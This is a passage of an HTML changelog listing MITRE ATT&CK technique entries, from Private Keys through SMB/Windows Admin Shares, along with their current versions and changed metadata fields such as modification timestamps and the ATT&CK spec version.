collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 15:45:06.768000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.709000+00:00</td></tr></tbody></table></details><hr><h4>[T1552.004] Unsecured Credentials: Private Keys</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:50.819000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.635000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1055.009] Process Injection: Proc Memory</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:28:52.682000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr></tbody></table></details><hr><h4>[T1564.010] Hide Artifacts: Process Argument Spoofing</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:25:25.946000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.727000+00:00</td></tr></tbody></table></details><hr><h4>[T1057] Process Discovery</h4><p><b>Current version</b>: 1.6</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:05.839000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.705000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1055.013] Process Injection: Process Doppelgänging</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:28:53.747000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.641000+00:00</td></tr></tbody></table></details><hr><h4>[T1055.012] Process Injection: Process Hollowing</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:30:23.429000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.708000+00:00</td></tr></tbody></table></details><hr><h4>[T1055] Process Injection</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:26:41.663000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.629000+00:00</td></tr></tbody></table></details><hr><h4>[T1572] Protocol Tunneling</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:45.888000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.632000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1001.003] Data Obfuscation: Protocol or Service Impersonation</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:20.574000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.714000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1090] Proxy</h4><p><b>Current version</b>: 3.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:57.330000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.641000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1055.008] Process Injection: Ptrace System Calls</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:30:27.359000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1216.001] System Script Proxy Execution: PubPrn</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:42:36.777000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1059.006] Command and Scripting Interpreter: Python</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:23.660000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.716000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1682] Query Public AI Services</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-20 20:59:00.096000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr></tbody></table></details><hr><h4>[T1012] Query Registry</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:20.660000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.714000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1542.004] Pre-OS Boot: ROMMONkit</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 18:38:49.551000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1600.001] Weaken Encryption: Reduce Key Space</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.005000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.627000+00:00</td></tr></tbody></table></details><hr><h4>[T1620] Reflective Code Loading</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:32:18.632000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.630000+00:00</td></tr></tbody></table></details><hr><h4>[T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:09.744000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1218.009] System Binary Proxy Execution: Regsvcs/Regasm</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:41:42.115000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.714000+00:00</td></tr></tbody></table></details><hr><h4>[T1218.010] System Binary Proxy Execution: Regsvr32</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:41:58.327000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.709000+00:00</td></tr></tbody></table></details><hr><h4>[T1070.010] Indicator Removal: Relocate Malware</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:29:55.911000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr></tbody></table></details><hr><h4>[T1219] Remote Access Tools</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:42.154000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.628000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1074.002] Data Staged: Remote Data Staging</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:38.453000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.626000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1021.001] Remote Services: Remote Desktop Protocol</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:33.524000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1219.002] Remote Access Tools: Remote Desktop Software</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-16 16:42:15.226000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1114.002] Email Collection: Remote Email Collection</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:15.355000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.708000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1018] Remote System Discovery</h4><p><b>Current version</b>: 3.6</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:31.319000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1036.003] Masquerading: Rename Legitimate Utilities</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:40:54.471000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.713000+00:00</td></tr></tbody></table></details><hr><h4>[T1564.009] Hide Artifacts: Resource Forking</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:25:32.891000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.708000+00:00</td></tr></tbody></table></details><hr><h4>[T1556.005] Modify Authentication Process: Reversible Encryption</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.082000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.718000+00:00</td></tr></tbody></table></details><hr><h4>[T1578.004] Modify Cloud Compute Infrastructure: Revert Cloud Instance</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.953000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1036.002] Masquerading: Right-to-Left Override</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:41:03.753000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.643000+00:00</td></tr></tbody></table></details><hr><h4>[T1207] Rogue Domain Controller</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.911000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.634000+00:00</td></tr></tbody></table></details><hr><h4>[T1014] Rootkit</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:32:28.874000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1564.006] Hide Artifacts: Run Virtual Instance</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:26:04.116000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.709000+00:00</td></tr></tbody></table></details><hr><h4>[T1218.011] System Binary Proxy Execution: Rundll32</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:42:03.135000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1134.005] Access Token Manipulation: SID-History Injection</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:55:14.114000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.709000+00:00</td></tr></tbody></table></details><hr><h4>[T1553.003] Subvert Trust Controls: SIP and Trust Provider Hijacking</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.087000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.633000+00:00</td></tr></tbody></table></details><hr><h4>[T1021.002] Remote Services: SMB/Windows Admin Shares</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: 